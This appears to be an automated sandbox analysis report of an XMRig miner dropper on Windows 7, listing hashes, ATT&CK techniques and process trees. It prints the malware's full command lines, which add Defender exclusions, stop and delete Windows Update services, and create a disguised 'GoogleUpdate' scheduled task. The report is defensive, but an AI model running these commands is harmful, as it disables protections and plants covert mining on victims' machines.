xmrig | c555bd99e5d32975594127b66602319349f1db161287b533915d92b4eb8420d3

Analysis

max time kernel
150s
max time network
153s
platform
windows7_x64
resource
win7-20220901-es
resource tags

arch:x64arch:x86image:win7-20220901-eslocale:es-esos:windows7-x64systemwindows
submitted
27-09-2022 15:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

NETSvc.exe
Size

4.0MB
MD5

9e2dccb45bffdc436741e88b0125cfba
SHA1

07ea0a692175a9a3c946263cb77fb8a328c8ebc1
SHA256

c555bd99e5d32975594127b66602319349f1db161287b533915d92b4eb8420d3
SHA512

457c90690d69830af121bb7c2f04e101ae59f79eb2f47f3489e65774cbabdc0537608c767e472e23740aea10d733c30441fe331538b0eb59734d3588dade492a
SSDEEP

49152:gT7yVPROZiO+S/+wpOBvfP35y8XVA1drVgfQi4V9XBVzc/4zQFFaNzzcICyxhouf:gT72P2irffhy8XV+ZiWzwiNzxOAukKr

Score

10^/10

xmrig evasion miner upx

Malware Config

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 2 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/2044-134-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/2044-139-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig

Executes dropped EXE 1 IoCs

Processes:

updater.exe

pid process

1776 updater.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
1776	updater.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/2044-134-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/2044-139-0x0000000140000000-0x00000001407F4000-memory.dmp	upx

Loads dropped DLL 1 IoCs

Processes:

taskeng.exe

pid process

1648 taskeng.exe

pid	process
1648	taskeng.exe

Drops file in System32 directory 2 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

updater.exe

description	pid	process	target process
PID 1776 set thread context of 1212	1776	updater.exe	conhost.exe
PID 1776 set thread context of 2044	1776	updater.exe	dwm.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

1520 sc.exe
928 sc.exe
1072 sc.exe
1924 sc.exe
992 sc.exe
324 sc.exe
1572 sc.exe
1516 sc.exe
1932 sc.exe
944 sc.exe
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1576 schtasks.exe
1736 schtasks.exe

pid	process
1520	sc.exe
928	sc.exe
1072	sc.exe
1924	sc.exe
992	sc.exe
324	sc.exe
1572	sc.exe
1516	sc.exe
1932	sc.exe
944	sc.exe

pid	process
1576	schtasks.exe
1736	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exedwm.exe

pid	process
1208	powershell.exe
1636	powershell.exe
476	powershell.exe
1584	powershell.exe
1472	powershell.exe
2044	dwm.exe
2044	dwm.exe
2044	dwm.exe
2044	dwm.exe
2044	dwm.exe
2044	dwm.exe
2044	dwm.exe
2044	dwm.exe
2044	dwm.exe
2044	dwm.exe
2044	dwm.exe
2044	dwm.exe
2044	dwm.exe
2044	dwm.exe
2044	dwm.exe
2044	dwm.exe
2044	dwm.exe
2044	dwm.exe
2044	dwm.exe
2044	dwm.exe
2044	dwm.exe
2044	dwm.exe
2044	dwm.exe
2044	dwm.exe
2044	dwm.exe
2044	dwm.exe
2044	dwm.exe
2044	dwm.exe
2044	dwm.exe
2044	dwm.exe
2044	dwm.exe
2044	dwm.exe
2044	dwm.exe
2044	dwm.exe
2044	dwm.exe
2044	dwm.exe
2044	dwm.exe
2044	dwm.exe
2044	dwm.exe
2044	dwm.exe
2044	dwm.exe
2044	dwm.exe
2044	dwm.exe
2044	dwm.exe
2044	dwm.exe
2044	dwm.exe
2044	dwm.exe
2044	dwm.exe
2044	dwm.exe
2044	dwm.exe
2044	dwm.exe
2044	dwm.exe
2044	dwm.exe
2044	dwm.exe
2044	dwm.exe
2044	dwm.exe
2044	dwm.exe
2044	dwm.exe
2044	dwm.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

420

pid	process
420

Suspicious use of AdjustPrivilegeToken 49 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exeupdater.exeWMIC.exedwm.exe

description	pid	process
Token: SeDebugPrivilege	1208	powershell.exe
Token: SeDebugPrivilege	1636	powershell.exe
Token: SeDebugPrivilege	476	powershell.exe
Token: SeDebugPrivilege	1584	powershell.exe
Token: SeDebugPrivilege	1472	powershell.exe
Token: SeDebugPrivilege	1776	updater.exe
Token: SeIncreaseQuotaPrivilege	752	WMIC.exe
Token: SeSecurityPrivilege	752	WMIC.exe
Token: SeTakeOwnershipPrivilege	752	WMIC.exe
Token: SeLoadDriverPrivilege	752	WMIC.exe
Token: SeSystemProfilePrivilege	752	WMIC.exe
Token: SeSystemtimePrivilege	752	WMIC.exe
Token: SeProfSingleProcessPrivilege	752	WMIC.exe
Token: SeIncBasePriorityPrivilege	752	WMIC.exe
Token: SeCreatePagefilePrivilege	752	WMIC.exe
Token: SeBackupPrivilege	752	WMIC.exe
Token: SeRestorePrivilege	752	WMIC.exe
Token: SeShutdownPrivilege	752	WMIC.exe
Token: SeDebugPrivilege	752	WMIC.exe
Token: SeSystemEnvironmentPrivilege	752	WMIC.exe
Token: SeRemoteShutdownPrivilege	752	WMIC.exe
Token: SeUndockPrivilege	752	WMIC.exe
Token: SeManageVolumePrivilege	752	WMIC.exe
Token: 33	752	WMIC.exe
Token: 34	752	WMIC.exe
Token: 35	752	WMIC.exe
Token: SeDebugPrivilege	1776	updater.exe
Token: SeIncreaseQuotaPrivilege	752	WMIC.exe
Token: SeSecurityPrivilege	752	WMIC.exe
Token: SeTakeOwnershipPrivilege	752	WMIC.exe
Token: SeLoadDriverPrivilege	752	WMIC.exe
Token: SeSystemProfilePrivilege	752	WMIC.exe
Token: SeSystemtimePrivilege	752	WMIC.exe
Token: SeProfSingleProcessPrivilege	752	WMIC.exe
Token: SeIncBasePriorityPrivilege	752	WMIC.exe
Token: SeCreatePagefilePrivilege	752	WMIC.exe
Token: SeBackupPrivilege	752	WMIC.exe
Token: SeRestorePrivilege	752	WMIC.exe
Token: SeShutdownPrivilege	752	WMIC.exe
Token: SeDebugPrivilege	752	WMIC.exe
Token: SeSystemEnvironmentPrivilege	752	WMIC.exe
Token: SeRemoteShutdownPrivilege	752	WMIC.exe
Token: SeUndockPrivilege	752	WMIC.exe
Token: SeManageVolumePrivilege	752	WMIC.exe
Token: 33	752	WMIC.exe
Token: 34	752	WMIC.exe
Token: 35	752	WMIC.exe
Token: SeLockMemoryPrivilege	2044	dwm.exe
Token: SeLockMemoryPrivilege	2044	dwm.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

NETSvc.execmd.exepowershell.exepowershell.exetaskeng.exeupdater.execmd.exe

description	pid	process	target process
PID 1268 wrote to memory of 1208	1268	NETSvc.exe	powershell.exe
PID 1268 wrote to memory of 1208	1268	NETSvc.exe	powershell.exe
PID 1268 wrote to memory of 1208	1268	NETSvc.exe	powershell.exe
PID 1268 wrote to memory of 304	1268	NETSvc.exe	cmd.exe
PID 1268 wrote to memory of 304	1268	NETSvc.exe	cmd.exe
PID 1268 wrote to memory of 304	1268	NETSvc.exe	cmd.exe
PID 1268 wrote to memory of 1636	1268	NETSvc.exe	powershell.exe
PID 1268 wrote to memory of 1636	1268	NETSvc.exe	powershell.exe
PID 1268 wrote to memory of 1636	1268	NETSvc.exe	powershell.exe
PID 304 wrote to memory of 944	304	cmd.exe	sc.exe
PID 304 wrote to memory of 944	304	cmd.exe	sc.exe
PID 304 wrote to memory of 944	304	cmd.exe	sc.exe
PID 304 wrote to memory of 1572	304	cmd.exe	sc.exe
PID 304 wrote to memory of 1572	304	cmd.exe	sc.exe
PID 304 wrote to memory of 1572	304	cmd.exe	sc.exe
PID 304 wrote to memory of 1516	304	cmd.exe	sc.exe
PID 304 wrote to memory of 1516	304	cmd.exe	sc.exe
PID 304 wrote to memory of 1516	304	cmd.exe	sc.exe
PID 304 wrote to memory of 324	304	cmd.exe	sc.exe
PID 304 wrote to memory of 324	304	cmd.exe	sc.exe
PID 304 wrote to memory of 324	304	cmd.exe	sc.exe
PID 304 wrote to memory of 1932	304	cmd.exe	sc.exe
PID 304 wrote to memory of 1932	304	cmd.exe	sc.exe
PID 304 wrote to memory of 1932	304	cmd.exe	sc.exe
PID 304 wrote to memory of 1200	304	cmd.exe	reg.exe
PID 304 wrote to memory of 1200	304	cmd.exe	reg.exe
PID 304 wrote to memory of 1200	304	cmd.exe	reg.exe
PID 304 wrote to memory of 1156	304	cmd.exe	reg.exe
PID 304 wrote to memory of 1156	304	cmd.exe	reg.exe
PID 304 wrote to memory of 1156	304	cmd.exe	reg.exe
PID 304 wrote to memory of 1928	304	cmd.exe	reg.exe
PID 304 wrote to memory of 1928	304	cmd.exe	reg.exe
PID 304 wrote to memory of 1928	304	cmd.exe	reg.exe
PID 304 wrote to memory of 1564	304	cmd.exe	reg.exe
PID 304 wrote to memory of 1564	304	cmd.exe	reg.exe
PID 304 wrote to memory of 1564	304	cmd.exe	reg.exe
PID 304 wrote to memory of 2024	304	cmd.exe	reg.exe
PID 304 wrote to memory of 2024	304	cmd.exe	reg.exe
PID 304 wrote to memory of 2024	304	cmd.exe	reg.exe
PID 1636 wrote to memory of 1576	1636	powershell.exe	schtasks.exe
PID 1636 wrote to memory of 1576	1636	powershell.exe	schtasks.exe
PID 1636 wrote to memory of 1576	1636	powershell.exe	schtasks.exe
PID 1268 wrote to memory of 476	1268	NETSvc.exe	powershell.exe
PID 1268 wrote to memory of 476	1268	NETSvc.exe	powershell.exe
PID 1268 wrote to memory of 476	1268	NETSvc.exe	powershell.exe
PID 476 wrote to memory of 1476	476	powershell.exe	schtasks.exe
PID 476 wrote to memory of 1476	476	powershell.exe	schtasks.exe
PID 476 wrote to memory of 1476	476	powershell.exe	schtasks.exe
PID 1648 wrote to memory of 1776	1648	taskeng.exe	updater.exe
PID 1648 wrote to memory of 1776	1648	taskeng.exe	updater.exe
PID 1648 wrote to memory of 1776	1648	taskeng.exe	updater.exe
PID 1776 wrote to memory of 1584	1776	updater.exe	powershell.exe
PID 1776 wrote to memory of 1584	1776	updater.exe	powershell.exe
PID 1776 wrote to memory of 1584	1776	updater.exe	powershell.exe
PID 1776 wrote to memory of 684	1776	updater.exe	cmd.exe
PID 1776 wrote to memory of 684	1776	updater.exe	cmd.exe
PID 1776 wrote to memory of 684	1776	updater.exe	cmd.exe
PID 1776 wrote to memory of 1472	1776	updater.exe	powershell.exe
PID 1776 wrote to memory of 1472	1776	updater.exe	powershell.exe
PID 1776 wrote to memory of 1472	1776	updater.exe	powershell.exe
PID 684 wrote to memory of 1520	684	cmd.exe	sc.exe
PID 684 wrote to memory of 1520	684	cmd.exe	sc.exe
PID 684 wrote to memory of 1520	684	cmd.exe	sc.exe
PID 684 wrote to memory of 928	684	cmd.exe	sc.exe

C:\Users\Admin\AppData\Local\Temp\NETSvc.exe
"C:\Users\Admin\AppData\Local\Temp\NETSvc.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1268

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1208

C:\Windows\system32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:304

C:\Windows\system32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:944

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:1572

C:\Windows\system32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:1516

C:\Windows\system32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:324

C:\Windows\system32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:1932

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:1156

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:1200

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
- Modifies security service
PID:1928

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:1564

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:2024

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#zgvxtubz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1636

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTaskMachineQC /tr 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'
3⤵
- Creates scheduled task(s)
PID:1576

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#ddxyuoslq#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe" }
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:476

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
3⤵
PID:1476

C:\Windows\system32\taskeng.exe
taskeng.exe {2A48C8D7-5514-4526-AAE9-86D3F293B332} S-1-5-21-4063495947-34355257-727531523-1000:RYNKSFQE\Admin:Interactive:[1]
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1648

C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1776

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1584

C:\Windows\system32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
- Suspicious use of WriteProcessMemory
PID:684

C:\Windows\system32\sc.exe
sc stop UsoSvc
4⤵
- Launches sc.exe
PID:1520

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
4⤵
- Launches sc.exe
PID:928

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
- Launches sc.exe
PID:1072

C:\Windows\system32\sc.exe
sc stop bits
4⤵
- Launches sc.exe
PID:1924

C:\Windows\system32\sc.exe
sc stop dosvc
4⤵
- Launches sc.exe
PID:992

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
4⤵
PID:1928

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
4⤵
PID:1700

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
4⤵
PID:1084

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
4⤵
PID:1748

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
4⤵
PID:1328

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#zgvxtubz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1472

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTaskMachineQC /tr 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'
4⤵
- Creates scheduled task(s)
PID:1736

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe jmcfgycslfymn
3⤵
PID:1212

C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Users\Admin\AppData\Roaming\Google\Libs\" & wmic PATH Win32_VideoController GET Name > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
4⤵
PID:636

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:752

C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Users\Admin\AppData\Roaming\Google\Libs\" & wmic PATH Win32_VideoController GET Name > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
3⤵
PID:1636

C:\Windows\system32\dwm.exe
C:\Windows\system32\dwm.exe rhsgxdrgcnvokcze 6E3sjfZq2rJQaxvLPmXgsA4f0StS9pic9Xw++oZ1mnbMNdSoXP4ts/KtNDhUPQkUGu8K1XCwbSh+ypLRcuGVjKHCqkQEbMjFPp2wEHUk/2YPEa7u8eDtaLNsvMtmfnW7pfZpWBLC28ol0YuaRyoAomoKg0M+MybStmWANwpbdJc3A2uC6nbgxCBAPoLOO1OuubEuAZTBCdX/xrrcvKnB4H9LwgUyVl9z4LaBunuWLn9L+984DlEL8pLkHAhoqzbgnzq2Q8UulW3Pe1gu+jesqTUbmj//6+fiMhPgKixPwrGz+CELGutufbQREgiXW/NQvg1coXmscuZ6yQ7RnXXKH4GsnmWjjAo51w5WaTYtMM4tqi5n6yulrtZsexR2Y9ab2lSIri/mxz2RWaQYEWaHr+wsVwDrDaUmzhazyLU8bE+gbFvD2hyocZFBvGnOyRz2iSzhnZ7rBWrLxt5q36TsGIHyIiMTkfwiniXKP/hUp/fAVcT9dBT6tKiKkFF/MseV
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2044

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
Filesize
4.0MB

MD5
d8b1e808045510a544b3bea75a4926e0

SHA1
a54f9cab1b1ba331d713e320195a51eed5387f7e

SHA256
1d861744d652e6b53ba7a8e7b8d1d3d137655433f1c80c097b64f12081d49bf5

SHA512
f4b8069157b3864ff5cc5fe176b162223ecb9a0881c77efd7e45e4024f0d685bf627fffddc2c811dbfd8bdf6b0ef03f193a9db6c648fa06b7af595e43d70e3e9

Download Submit
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
Filesize
4.0MB

MD5
d8b1e808045510a544b3bea75a4926e0

SHA1
a54f9cab1b1ba331d713e320195a51eed5387f7e

SHA256
1d861744d652e6b53ba7a8e7b8d1d3d137655433f1c80c097b64f12081d49bf5

SHA512
f4b8069157b3864ff5cc5fe176b162223ecb9a0881c77efd7e45e4024f0d685bf627fffddc2c811dbfd8bdf6b0ef03f193a9db6c648fa06b7af595e43d70e3e9

Download Submit
C:\Users\Admin\AppData\Roaming\Google\Libs\g.log
Filesize
130B

MD5
ff889485460423abe28a5f240c638e71

SHA1
c0531161d3b30fc970d021da5ed522178e3e822a

SHA256
17be917992bb99cd1ed0ea975a180bb95ce9dfc0eb6f0bb69034b2d7abff618a

SHA512
90770b3e244c1ed2f94d8b3c4a9e8921a57082f8b38ca8a7b7804b03f8095aae3786bbdd7829b772711e00009c0277663f584a83d0ab92b19bbe525ffb1dc246

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
4a5d6feeec94f13f7ed30287db110bbe

SHA1
16154dca464eeae03eaf8ebdeaaa71594cac4c76

SHA256
51ab1570226b88a696915741044f4859b8c28cdd7c761079a36f42c26e436fc9

SHA512
f72dc18577ad87f0cd0d490b9c8c267b240db407474038c78d16f4ea531bd66af236b0861cfb5d8878262ba025d1f0318b61818119ec53db29782ba1fd6e3b1a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
4a5d6feeec94f13f7ed30287db110bbe

SHA1
16154dca464eeae03eaf8ebdeaaa71594cac4c76

SHA256
51ab1570226b88a696915741044f4859b8c28cdd7c761079a36f42c26e436fc9

SHA512
f72dc18577ad87f0cd0d490b9c8c267b240db407474038c78d16f4ea531bd66af236b0861cfb5d8878262ba025d1f0318b61818119ec53db29782ba1fd6e3b1a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
4a5d6feeec94f13f7ed30287db110bbe

SHA1
16154dca464eeae03eaf8ebdeaaa71594cac4c76

SHA256
51ab1570226b88a696915741044f4859b8c28cdd7c761079a36f42c26e436fc9

SHA512
f72dc18577ad87f0cd0d490b9c8c267b240db407474038c78d16f4ea531bd66af236b0861cfb5d8878262ba025d1f0318b61818119ec53db29782ba1fd6e3b1a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
4a5d6feeec94f13f7ed30287db110bbe

SHA1
16154dca464eeae03eaf8ebdeaaa71594cac4c76

SHA256
51ab1570226b88a696915741044f4859b8c28cdd7c761079a36f42c26e436fc9

SHA512
f72dc18577ad87f0cd0d490b9c8c267b240db407474038c78d16f4ea531bd66af236b0861cfb5d8878262ba025d1f0318b61818119ec53db29782ba1fd6e3b1a

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
Filesize
4.0MB

MD5
d8b1e808045510a544b3bea75a4926e0

SHA1
a54f9cab1b1ba331d713e320195a51eed5387f7e

SHA256
1d861744d652e6b53ba7a8e7b8d1d3d137655433f1c80c097b64f12081d49bf5

SHA512
f4b8069157b3864ff5cc5fe176b162223ecb9a0881c77efd7e45e4024f0d685bf627fffddc2c811dbfd8bdf6b0ef03f193a9db6c648fa06b7af595e43d70e3e9

Download Submit
memory/304-62-0x0000000000000000-mapping.dmp

Download
memory/324-69-0x0000000000000000-mapping.dmp

Download
memory/476-93-0x000000000242B000-0x000000000244A000-memory.dmp

Filesize
124KB

Download
memory/476-90-0x000000001B7D0000-0x000000001BACF000-memory.dmp

Filesize
3.0MB

Download
memory/476-89-0x0000000002424000-0x0000000002427000-memory.dmp

Filesize
12KB

Download
memory/476-88-0x000007FEF3260000-0x000007FEF3DBD000-memory.dmp

Filesize
11.4MB

Download
memory/476-87-0x000007FEF3DC0000-0x000007FEF47E3000-memory.dmp

Filesize
10.1MB

Download
memory/476-84-0x0000000000000000-mapping.dmp

Download
memory/476-92-0x0000000002424000-0x0000000002427000-memory.dmp

Filesize
12KB

Download
memory/636-130-0x0000000000000000-mapping.dmp

Download
memory/684-108-0x0000000000000000-mapping.dmp

Download
memory/752-132-0x0000000000000000-mapping.dmp

Download
memory/928-111-0x0000000000000000-mapping.dmp

Download
memory/944-64-0x0000000000000000-mapping.dmp

Download
memory/992-116-0x0000000000000000-mapping.dmp

Download
memory/1072-112-0x0000000000000000-mapping.dmp

Download
memory/1084-121-0x0000000000000000-mapping.dmp

Download
memory/1156-74-0x0000000000000000-mapping.dmp

Download
memory/1200-72-0x0000000000000000-mapping.dmp

Download
memory/1208-56-0x000007FEF3DC0000-0x000007FEF47E3000-memory.dmp

Filesize
10.1MB

Download
memory/1208-59-0x000000001B7A0000-0x000000001BA9F000-memory.dmp

Filesize
3.0MB

Download
memory/1208-61-0x000000000289B000-0x00000000028BA000-memory.dmp

Filesize
124KB

Download
memory/1208-57-0x000007FEF3260000-0x000007FEF3DBD000-memory.dmp

Filesize
11.4MB

Download
memory/1208-60-0x0000000002894000-0x0000000002897000-memory.dmp

Filesize
12KB

Download
memory/1208-58-0x0000000002894000-0x0000000002897000-memory.dmp

Filesize
12KB

Download
memory/1208-55-0x000007FEFB821000-0x000007FEFB823000-memory.dmp

Filesize
8KB

Download
memory/1208-54-0x0000000000000000-mapping.dmp

Download
memory/1212-129-0x00000001400014E0-mapping.dmp

Download
memory/1328-125-0x0000000000000000-mapping.dmp

Download
memory/1472-128-0x00000000024CB000-0x00000000024EA000-memory.dmp

Filesize
124KB

Download
memory/1472-120-0x000007FEF3260000-0x000007FEF3DBD000-memory.dmp

Filesize
11.4MB

